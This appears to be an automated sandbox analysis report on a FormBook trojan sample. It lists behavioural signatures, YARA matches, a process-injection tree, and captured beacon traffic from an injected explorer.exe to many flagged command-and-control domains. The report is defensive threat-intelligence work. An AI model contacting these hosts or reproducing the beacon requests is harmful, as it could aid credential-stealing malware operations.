

Windows Analysis Report
u8QPnVhq0N.exe

Overview

General Information

Sample Name: u8QPnVhq0N.exe
Original Sample Name: 7de990046a20e6666627273589b014a5.exe
Analysis ID: 830804
MD5: 7de990046a20e6666627273589b014a5
SHA1: 55ebccd35c2329c5816cd0240b0919651ac58321
SHA256: ebce15ad53b98d7aba7f7544ee947e88f58d696e22ca4bc5d15b2ded37b577ac
Tags: 32, exe, Formbook, trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • u8QPnVhq0N.exe (PID: 5836 cmdline: C:\Users\user\Desktop\u8QPnVhq0N.exe MD5: 7DE990046A20E6666627273589B014A5)
    • mcwfy.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f MD5: 6CB712E482D150A185F713D75314A75A)
      • conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • mcwfy.exe (PID: 4964 cmdline: C:\Users\user\AppData\Local\Temp\mcwfy.exe MD5: 6CB712E482D150A185F713D75314A75A)
        • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • autoconv.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
          • cmstp.exe (PID: 5232 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings

Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
Strings:
  • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x19f18:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x199b4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1a01a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1a192:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xc83d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x18bff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1fcaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x20c5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
Strings:
  • 0x1f0e0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x182f7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
Source | Rule | Description | Author | Strings

Source: 3.2.mcwfy.exe.400000.0.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 3.2.mcwfy.exe.400000.0.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
Strings:
  • 0x20103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xbe72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1931a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

Source: 3.2.mcwfy.exe.400000.0.unpack | Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x19118:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x18bb4:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x1921a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x19392:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xba3d:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x17dff:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x1eeaa:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1fe5d:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 3.2.mcwfy.exe.400000.0.raw.unpack | Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security

Source: 3.2.mcwfy.exe.400000.0.raw.unpack | Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
Strings:
  • 0x20f03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xcc72:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x1a11a:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83

No Sigma rule has matched
No Snort rule has matched


          AV Detection

          Source: u8QPnVhq0N.exe | ReversingLabs: Detection: 46%
          Source: u8QPnVhq0N.exe | Virustotal: Detection: 48%
          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 3.2.mcwfy.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm | Avira URL Cloud: Label: malware
          Source: http://white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0Iy | Avira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/www.thewildphotographer.co.uk | Avira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/www.avisrezervee.com | Avira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/www.gritslab.com | Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/www.white-hat.uk | Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/www.energyservicestation.com | Avira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.thewildphotographer.co.uk/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.gritslab.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/www.222ambking.org | Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.energyservicestation.com/u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop/u2kb/www.fclaimrewardccpointq.shop | Avira URL Cloud: Label: malware
          Source: http://www.avisrezervee.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.un-object.com/u2kb/www.un-object.com | Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/www.thedivinerudraksha.com | Avira URL Cloud: Label: malware
          Source: http://www.fclaimrewardccpointq.shop | Avira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.white-hat.uk/u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.222ambking.org/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.germanreps.com/u2kb/www.germanreps.com | Avira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/www.younrock.com | Avira URL Cloud: Label: malware
          Source: http://thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pR | Avira URL Cloud: Label: malware
          Source: http://www.younrock.com/u2kb/ | Avira URL Cloud: Label: malware
          Source: http://www.shapshit.xyz/u2kb/www.shapshit.xyz | Avira URL Cloud: Label: malware
          Source: http://www.ecomofietsen.com/u2kb/www.ecomofietsen.com | Avira URL Cloud: Label: malware
          Source: http://www.bitservicesltd.com/u2kb/www.bitservicesltd.com | Avira URL Cloud: Label: malware
          Source: http://www.thedivinerudraksha.com/u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p | Avira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | ReversingLabs: Detection: 33%
          Source: u8QPnVhq0N.exe | Joe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Joe Sandbox ML: detected
          Source: 3.2.mcwfy.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.mcwfy.exe.2080000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
          Source: u8QPnVhq0N.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: u8QPnVhq0N.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmstp.pdbGCTL source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: mcwfy.exe, 00000001.00000003.313808108.000000001A010000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000001.00000003.313302053.0000000019E80000.00000004.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: mcwfy.exe, mcwfy.exe, 00000003.00000003.315528444.0000000000955000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000003.313591714.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000C0F000.00000040.00001000.00020000.00000000.sdmp, mcwfy.exe, 00000003.00000002.361678876.0000000000AF0000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.000000000498F000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.361053671.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000006.00000002.568514237.0000000004870000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000006.00000003.362960613.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmstp.pdb source: mcwfy.exe, 00000003.00000002.361655011.0000000000A30000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_0040699E FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\u8QPnVhq0N.exe | Code function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\mcwfy.exe | Code function: 1_2_004089B8 FindFirstFileExW,

          Networking

          Source: C:\Windows\explorer.exe | Network Connect: 85.187.128.34 80
          Source: C:\Windows\explorer.exe | Network Connect: 91.195.240.94 80
          Source: C:\Windows\explorer.exe | Domain query: www.un-object.com
          Source: C:\Windows\explorer.exe | Domain query: www.energyservicestation.com
          Source: C:\Windows\explorer.exe | Network Connect: 78.141.192.145 80
          Source: C:\Windows\explorer.exe | Domain query: www.white-hat.uk
          Source: C:\Windows\explorer.exe | Domain query: www.thewildphotographer.co.uk
          Source: C:\Windows\explorer.exe | Domain query: www.shapshit.xyz
          Source: C:\Windows\explorer.exe | Network Connect: 192.185.17.12 80
          Source: C:\Windows\explorer.exe | Domain query: www.thedivinerudraksha.com
          Source: C:\Windows\explorer.exe | Network Connect: 199.192.30.147 80
          Source: C:\Windows\explorer.exe | Domain query: www.bitservicesltd.com
          Source: C:\Windows\explorer.exe | Domain query: www.younrock.com
          Source: C:\Windows\explorer.exe | Domain query: www.gritslab.com
          Source: C:\Windows\explorer.exe | Network Connect: 161.97.163.8 80
          Source: C:\Windows\explorer.exe | Domain query: www.222ambking.org
          Source: C:\Windows\explorer.exe | Network Connect: 81.17.29.149 80
          Source: C:\Windows\explorer.exe | Domain query: www.fclaimrewardccpointq.shop
          Source: C:\Windows\explorer.exe | Network Connect: 94.176.104.86 80
          Source: C:\Windows\explorer.exe | Network Connect: 213.145.228.111 80
          Source: C:\Windows\explorer.exe | Network Connect: 72.14.185.43 80
          Source: C:\Windows\explorer.exe | DNS query: www.shapshit.xyz
          Source: Joe Sandbox View | ASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=PXfMycAZpTAipct8YsIgv6PR3Y11yPgF2k7967nf/qU1A0mUqq9Jy2mfr4kURdfD0IyZUuXLnrTzZCke5/3g9z1JjJjKyNNZNw==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.white-hat.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=ydCzFiH7iMWnz6xHMre3IWaEcfnK5+fYQUsmgPEoYCSsyD6HgT3yZXCBsea1O+OKnOGwPNRrrKn2ANadQmZuoq3zmdf3x1nRXg==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.gritslab.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=rr+sOBvEXsBdGevUkZEAvniGWrNxzC1YNHmXivr92FQhRIIYsedRhL+YGaN2VCieGtjtLTUTzUqxDX3Wf7WovfMRM9ceCuTm3Q==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.bitservicesltd.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=IEUpLmGg2fqLmrhwDd0CH8vm0i8ubOQDFcodV2ACJcW4bHSQscR3aN4MRDv2q1O0g2vnwuasF99orDvyVUehJPYRcFQEZ60O6g==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.222ambking.org | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=IK59b/MdFRha+CUVMWpzDpHQ2riuD6F66TLC1fPPNwLnZq29gpb12AWvlZbo17UEh0sBgFvevrMQsuZfYKuAI0Y2tVIkdALeFw==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.energyservicestation.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=05tPwqSdqXO2xf32BHQi8E1nUfoFa2c80hhB3sQ3FFDNPs5AZDU6EjUymll22Wm6Scj5xbzg3GdXyuHgSKqxyFLAdmHecJKz/g==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.younrock.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=pn+zaWXo7szcfRSxpZYFMSllMpP2ulP+x3705F5u21IqvN9WG9kcUa2nxvPm1UX5MTo8dUhpuHauDgBRPTa20dSRfVLCBC+wQQ==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.thewildphotographer.co.uk | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=Yd5Rzn4EVOpL1Cl/e5Amzdaa+E7UlYBpl8BtE0ZhlgLGbR5cH1Fns9iDSFPM0EqDoX1il4mP+EMsdt2zebBg7FEeCQ3NU/ifUg==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.shapshit.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: global traffic | HTTP traffic detected: GET /u2kb/?X51Qjm=im5SXjRwbJIZeY2yeMVWNNnKg99Etck2UhYi2fNZ2Kf/X7lq2SPR1Q6pROq8Gck3yLtOH/fXnE++yuD9U7pvtIMkBqNJDo2oag==&w6DN_=E0EQSM0RCb349p HTTP/1.1 | Host: www.thedivinerudraksha.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
          Source: Joe Sandbox View | IP Address: 85.187.128.34 85.187.128.34
          Source: Joe Sandbox View | IP Address: 91.195.240.94 91.195.240.94
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.gritslab.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.gritslab.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.gritslab.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 28 66 71 54 47 58 66 5f 6b 4e 50 63 28 71 42 41 48 34 79 65 65 47 71 37 51 76 76 30 28 4b 48 6e 55 46 49 79 6f 36 46 44 47 79 4f 78 31 52 43 64 68 42 69 47 5a 54 69 70 36 4d 43 78 41 63 47 79 67 38 32 47 4b 76 51 30 79 71 62 56 46 4d 4f 67 5a 46 52 4d 6a 4a 7e 30 73 66 28 38 7a 79 58 7a 66 6e 39 50 4a 59 77 36 54 47 71 44 36 43 4e 68 44 53 6d 4f 36 4a 42 39 58 68 68 45 7a 70 39 37 45 71 79 67 43 70 6c 45 44 6a 74 62 50 61 61 41 41 54 74 76 34 66 34 75 37 70 38 65 72 6f 7a 68 36 48 6d 6e 73 54 38 5f 67 6a 6b 49 4a 41 62 6a 6e 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=(fqTGXf_kNPc(qBAH4yeeGq7Qvv0(KHnUFIyo6FDGyOx1RCdhBiGZTip6MCxAcGyg82GKvQ0yqbVFMOgZFRMjJ~0sf(8zyXzfn9PJYw6TGqD6CNhDSmO6JB9XhhEzp97EqygCplEDjtbPaaAATtv4f4u7p8erozh6HmnsT8_gjkIJAbjng).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.bitservicesltd.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.bitservicesltd.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bitservicesltd.com/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 6d 70 57 4d 4e 78 6e 56 5a 4e 73 76 41 38 57 70 67 5a 41 47 36 57 4f 48 65 36 42 39 76 69 70 59 43 68 71 6c 70 35 61 38 68 32 67 6d 59 35 67 43 6c 64 4d 76 76 66 57 4b 5a 37 52 57 5a 77 79 35 4c 76 33 6e 4d 67 6c 50 31 58 37 68 48 55 4b 31 65 59 4f 54 6b 75 49 34 42 39 55 38 49 63 69 44 7e 52 31 52 35 65 4c 5a 54 62 69 53 72 46 61 6f 57 53 46 55 30 2d 30 6e 67 69 6b 76 74 54 68 53 41 58 46 30 31 57 6f 61 4d 64 32 6c 73 6c 56 70 4c 30 52 56 4c 37 45 30 34 56 7e 66 70 77 52 37 33 61 51 79 4e 64 34 6c 45 50 44 76 62 74 35 59 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=mpWMNxnVZNsvA8WpgZAG6WOHe6B9vipYChqlp5a8h2gmY5gCldMvvfWKZ7RWZwy5Lv3nMglP1X7hHUK1eYOTkuI4B9U8IciD~R1R5eLZTbiSrFaoWSFU0-0ngikvtThSAXF01WoaMd2lslVpL0RVL7E04V~fpwR73aQyNd4lEPDvbt5YRg).
          Source: global trafficHTTP traffic detected: POST /u2kb/ HTTP/1.1Host: www.222ambking.orgConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.222ambking.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.222ambking.org/u2kb/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 58 35 31 51 6a 6d 3d 46 47 38 4a 49 54 32 5f 67 71 76 79 72 37 63 7a 65 61 49 6e 5a 49 58 77 38 52 49 64 45 76 4d 46 44 59 49 65 55 47 56 63 52 36 57 64 42 46 66 4f 6e 65 6b 48 57 2d 59 56 41 51 76 68 79 6e 57 59 6f 55 50 34 6b 4e 72 75 41 38 74 4f 76 6b 28 51 66 44 65 79 43 34 35 4b 57 48 49 4b 55 62 4e 32 37 58 73 31 48 41 28 50 43 46 44 7a 6f 4b 47 33 38 69 38 46 6e 57 35 76 6e 65 4b 69 58 6a 64 51 35 2d 4f 6d 58 48 7e 46 4a 31 6e 47 62 68 6e 31 61 45 57 42 75 66 6e 4f 76 55 34 51 45 52 4d 49 77 48 43 72 70 42 7a 56 71 64 6e 67 50 4f 67 77 36 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: X51Qjm=FG8JIT2_gqvyr7czeaInZIXw8RIdEvMFDYIeUGVcR6WdBFfOnekHW-YVAQvhynWYoUP4kNruA8tOvk(QfDeyC45KWHIKUbN27Xs1HA(PCFDzoKG38i8FnW5vneKiXjdQ5-OmXH~FJ1nGbhn1aEWBufnOvU4QERMIwHCrpBzVqdngPOgw6Q).
